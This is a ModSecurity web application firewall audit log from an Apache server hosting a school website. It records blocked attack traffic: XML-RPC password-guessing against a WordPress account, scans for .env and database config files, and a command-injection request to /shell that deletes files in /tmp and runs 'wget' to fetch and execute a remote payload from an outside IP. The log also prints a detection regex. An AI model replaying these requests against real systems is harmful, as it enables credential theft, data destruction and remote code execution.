Stopwatch2: 1745081756834471 5035; combined=3924, p1=460, p2=3294, p3=0, p4=0, p5=100, sr=79, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fefadc09-Z--
--698b4020-A--
[19/Apr/2025:23:56:59 +0700] aAPV2w6cTFSgLAHl7PpQ-AAAAAo 103.236.140.4 46880 103.236.140.4 8181
--698b4020-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--698b4020-C--
wp.getUsersBlogs
kesiswaan
qqq
--698b4020-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--698b4020-E--
--698b4020-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081819355313 5632 (- - -)
Stopwatch2: 1745081819355313 5632; combined=4003, p1=492, p2=3389, p3=0, p4=0, p5=72, sr=86, sw=50, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--698b4020-Z--
--b3ae1662-A--
[19/Apr/2025:23:58:01 +0700] aAPWGevDiFC_ir7MDwZVSwAAAEg 103.236.140.4 47188 103.236.140.4 8181
--b3ae1662-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--b3ae1662-C--
wp.getUsersBlogs
kesiswaan
caonima123
--b3ae1662-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b3ae1662-E--
--b3ae1662-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081881367565 5798 (- - -)
Stopwatch2: 1745081881367565 5798; combined=4067, p1=512, p2=3376, p3=0, p4=0, p5=105, sr=89, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b3ae1662-Z--
--8d648975-A--
[19/Apr/2025:23:59:01 +0700] aAPWVUruoUXZj665VUF1JQAAANE 103.236.140.4 47474 103.236.140.4 8181
--8d648975-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8d648975-C--
wp.getUsersBlogs
kesiswaan
aaaaa
--8d648975-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8d648975-E--
--8d648975-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745081941174561 5442 (- - -)
Stopwatch2: 1745081941174561 5442; combined=3739, p1=483, p2=3095, p3=0, p4=0, p5=95, sr=89, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8d648975-Z--
--1ac56b2e-A--
[20/Apr/2025:00:00:01 +0700] aAPWkUruoUXZj665VUF1QAAAAMY 103.236.140.4 47776 103.236.140.4 8181
--1ac56b2e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1ac56b2e-C--
wp.getUsersBlogs
kesiswaan
admin!@#
--1ac56b2e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1ac56b2e-E--
--1ac56b2e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745082001787148 5484 (- - -)
Stopwatch2: 1745082001787148 5484; combined=4122, p1=459, p2=3310, p3=0, p4=0, p5=191, sr=86, sw=162, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1ac56b2e-Z--
--0b4ac10b-A--
[20/Apr/2025:00:03:54 +0700] aAPXenNa4dA2HllpK_PqRQAAAIE 103.236.140.4 48684 103.236.140.4 8181
--0b4ac10b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.59.160.222
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.59.160.222
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: */*
--0b4ac10b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0b4ac10b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745082234035165 731 (- - -)
Stopwatch2: 1745082234035165 731; combined=330, p1=293, p2=0, p3=0, p4=0, p5=37, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0b4ac10b-Z--
--80fd7b65-A--
[20/Apr/2025:00:23:44 +0700] aAPcIHNa4dA2HllpK_PrXgAAAIQ 103.236.140.4 53284 103.236.140.4 8181
--80fd7b65-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.202
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.202
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--80fd7b65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--80fd7b65-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745083424799742 850 (- - -)
Stopwatch2: 1745083424799742 850; combined=388, p1=284, p2=0, p3=0, p4=0, p5=104, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--80fd7b65-Z--
--72f9a80b-A--
[20/Apr/2025:00:23:44 +0700] aAPcIEruoUXZj665VUF2zAAAANg 103.236.140.4 53290 103.236.140.4 8181
--72f9a80b-B--
GET /config/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.202
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.202
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--72f9a80b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--72f9a80b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745083424968775 758 (- - -)
Stopwatch2: 1745083424968775 758; combined=289, p1=240, p2=0, p3=0, p4=0, p5=48, sr=65, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--72f9a80b-Z--
--2d4e550b-A--
[20/Apr/2025:00:23:45 +0700] aAPcIUruoUXZj665VUF2zQAAAMI 103.236.140.4 53292 103.236.140.4 8181
--2d4e550b-B--
GET /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.202
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.202
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--2d4e550b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2d4e550b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745083425137956 749 (- - -)
Stopwatch2: 1745083425137956 749; combined=292, p1=256, p2=0, p3=0, p4=0, p5=35, sr=71, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2d4e550b-Z--
--8a0cc222-A--
[20/Apr/2025:00:23:45 +0700] aAPcIQ6cTFSgLAHl7PpSvAAAAAY 103.236.140.4 53294 103.236.140.4 8181
--8a0cc222-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.202
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.202
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--8a0cc222-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8a0cc222-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745083425306698 650 (- - -)
Stopwatch2: 1745083425306698 650; combined=276, p1=231, p2=0, p3=0, p4=0, p5=45, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8a0cc222-Z--
--36f25840-A--
[20/Apr/2025:00:23:45 +0700] aAPcIUruoUXZj665VUF2zgAAANM 103.236.140.4 53296 103.236.140.4 8181
--36f25840-B--
GET /settings/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.202
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.202
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--36f25840-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--36f25840-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745083425493933 712 (- - -)
Stopwatch2: 1745083425493933 712; combined=260, p1=213, p2=0, p3=0, p4=0, p5=47, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--36f25840-Z--
--e9b52b55-A--
[20/Apr/2025:00:23:46 +0700] aAPcIkruoUXZj665VUF20wAAAM8 103.236.140.4 53312 103.236.140.4 8181
--e9b52b55-B--
GET /db.ini HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.202
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.202
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--e9b52b55-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e9b52b55-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745083426666433 1601 (- - -)
Stopwatch2: 1745083426666433 1601; combined=692, p1=297, p2=356, p3=0, p4=0, p5=39, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e9b52b55-Z--
--a8c5bb4e-A--
[20/Apr/2025:00:23:48 +0700] aAPcJHNa4dA2HllpK_PrYQAAAI0 103.236.140.4 53344 103.236.140.4 8181
--a8c5bb4e-B--
GET /docker/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.202
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.202
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--a8c5bb4e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a8c5bb4e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745083428948117 610 (- - -)
Stopwatch2: 1745083428948117 610; combined=269, p1=246, p2=0, p3=0, p4=0, p5=22, sr=53, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a8c5bb4e-Z--
--712c864c-A--
[20/Apr/2025:00:36:00 +0700] aAPfAOvDiFC_ir7MDwZYcwAAAE0 103.236.140.4 60982 103.236.140.4 8181
--712c864c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36
Accept-Charset: utf-8
--712c864c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--712c864c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745084160882609 763 (- - -)
Stopwatch2: 1745084160882609 763; combined=327, p1=286, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--712c864c-Z--
--db9bd134-A--
[20/Apr/2025:00:52:03 +0700] aAPiw0ruoUXZj665VUF8_QAAAMM 103.236.140.4 51348 103.236.140.4 8181
--db9bd134-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.59.160.222
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.59.160.222
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: */*
--db9bd134-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--db9bd134-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745085123204861 843 (- - -)
Stopwatch2: 1745085123204861 843; combined=351, p1=308, p2=0, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--db9bd134-Z--
--222de964-A--
[20/Apr/2025:02:06:57 +0700] aAP0UevDiFC_ir7MDwZh6gAAAEY 103.236.140.4 41928 103.236.140.4 8181
--222de964-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.72.19
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.72.19
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.10 Safari/537.36 Edg/77.0.235.5
Accept-Charset: utf-8
--222de964-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--222de964-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745089617901802 750 (- - -)
Stopwatch2: 1745089617901802 750; combined=297, p1=262, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--222de964-Z--
--1a1e4529-A--
[20/Apr/2025:02:07:02 +0700] aAP0Vg6cTFSgLAHl7PpfQgAAAAc 103.236.140.4 41950 103.236.140.4 8181
--1a1e4529-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.72.19
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.72.19
X-Forwarded-Proto: http
Connection: close
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Accept-Charset: utf-8
--1a1e4529-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1a1e4529-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745089622898294 759 (- - -)
Stopwatch2: 1745089622898294 759; combined=305, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1a1e4529-Z--
--fb37de3c-A--
[20/Apr/2025:02:51:59 +0700] aAP-33Na4dA2HllpK_P4NQAAAJc 103.236.140.4 52598 103.236.140.4 8181
--fb37de3c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.71.217
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.71.217
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--fb37de3c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fb37de3c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745092319247459 778 (- - -)
Stopwatch2: 1745092319247459 778; combined=331, p1=273, p2=0, p3=0, p4=0, p5=58, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fb37de3c-Z--
--ca9edd41-A--
[20/Apr/2025:03:42:32 +0700] aAQKuFu16wJWB6g0mU_wywAAABQ 103.236.140.4 36062 103.236.140.4 8181
--ca9edd41-B--
GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.0
Host: 127.0.0.1
X-Real-IP: 183.250.254.92
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-For: 183.250.254.92
X-Forwarded-Proto: http
Connection: close
User-Agent: Hello, world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
--ca9edd41-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ca9edd41-E--
--ca9edd41-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||127.0.0.1|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget 31.58.51.98/jaws;sh /tmp/jaws: cd/tmp rm -rf * wget 31.58.51.98/jaws sh/tmp/jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
